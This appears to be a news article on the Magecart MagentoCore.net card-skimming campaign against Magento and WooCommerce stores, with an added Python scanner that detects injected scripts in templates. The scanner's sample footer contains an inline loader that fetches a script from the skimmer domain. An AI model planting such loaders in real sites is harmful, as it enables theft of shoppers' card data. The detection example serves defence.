The independent malware hunter Willem de Groot said he suspects the Magecart group behind it is the same outfit that pulled off the Ticketmaster heist earlier in 2018.
The infections are part of a single effort, all tied back to one well-resourced group with global reach. The campaign is global, de Groot said, and ongoing. According to de Groot’s nightly scans, new stores are being hijacked at the alarming pace of 50 to 60 per day.
Further, the script appears to be rather persistent. The average recovery time is “a few weeks,” he said, with at least 1,450 ecommerce sites hosting the MagentoCore.net parasite during the full six months of his analysis.
The Magecart actors are targeting online stores running WooCommerce on WordPress or the Magento platform, and “the attack vector is, in almost all recent cases, brute-forcing the administrator password.” Attackers can also gain unauthorized access from a staff computer that’s infected with malware, or by hijacking an authorized session using a vulnerability in the content management system (CMS).
As for the code itself, the skimmer has been around since December 2017, although less sophisticated versions were found as early as 2015. Once the actors succeed in gaining access to the back-end CMS running the website, they embed the MagentoCore.net JavaScript code into the HTML template. This can be hidden in a few places, including in default HTML headers and footers, and in minified, static, hidden JavaScript files deep in the codebase. It also adds a backdoor to cron.php.
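Because the skimmer is dropped into templates and footers as a script tag or an inline loader, a store operator's first check is a scan of rendered templates for scripts that load from hosts outside the store's own allowlist and for inline scripts that mention the indicator domain. The following is an added example, not code from the article or from de Groot's scanner; the allowlist, the sample footer and the loader stub in it are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

INDICATOR_HOSTS = {"magentocore.net"}  # skimmer domain named in the article


class ScriptCollector(HTMLParser):
    """Collect external <script src> values and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []  # start buffering an inline script body

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def _host_of(src):
    """Host of an absolute or protocol-relative URL; '' for a same-origin path."""
    if src.startswith("//") or "://" in src:
        return (urlparse(src).hostname or "").lower()
    return ""


def scan_html(html, allowed_hosts):
    """Return (reason, detail) findings: scripts served from hosts outside the
    allowlist, and inline scripts that mention a known skimmer domain."""
    p = ScriptCollector()
    p.feed(html)
    findings = [("external-script", s) for s in p.external
                if _host_of(s) and _host_of(s) not in allowed_hosts]
    for body in p.inline:
        findings += [("indicator-in-inline-script", h)
                     for h in INDICATOR_HOSTS if h in body.lower()]
    return findings


# Constructed footer template (not a real capture): one legitimate same-origin
# script, one injected external script and one inline loader stub.
SAMPLE_FOOTER = """<div id="footer">
<script src="/js/checkout.js"></script>
<script src="//magentocore.net/mage/mage.js"></script>
<script>var s=document.createElement('script');s.src='https://magentocore.net/mage/mage.js';document.head.appendChild(s);</script>
</div>"""
```

Run `scan_html` over every template, header and footer file the CMS renders, with the allowlist set to the store's own hosts and sanctioned CDNs; anything it reports is a candidate for the manual review the article says takes "a few weeks" on average.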
Once installed, it sets about recording the keystrokes of unsuspecting online shoppers, sending everything in real time to the malware’s server, registered in Moscow. Magecart has been seen recruiting US money mules to monetise the stolen card information, and de Groot said the actors can also sell the card data on the black market for USD 5 to USD 30 per card.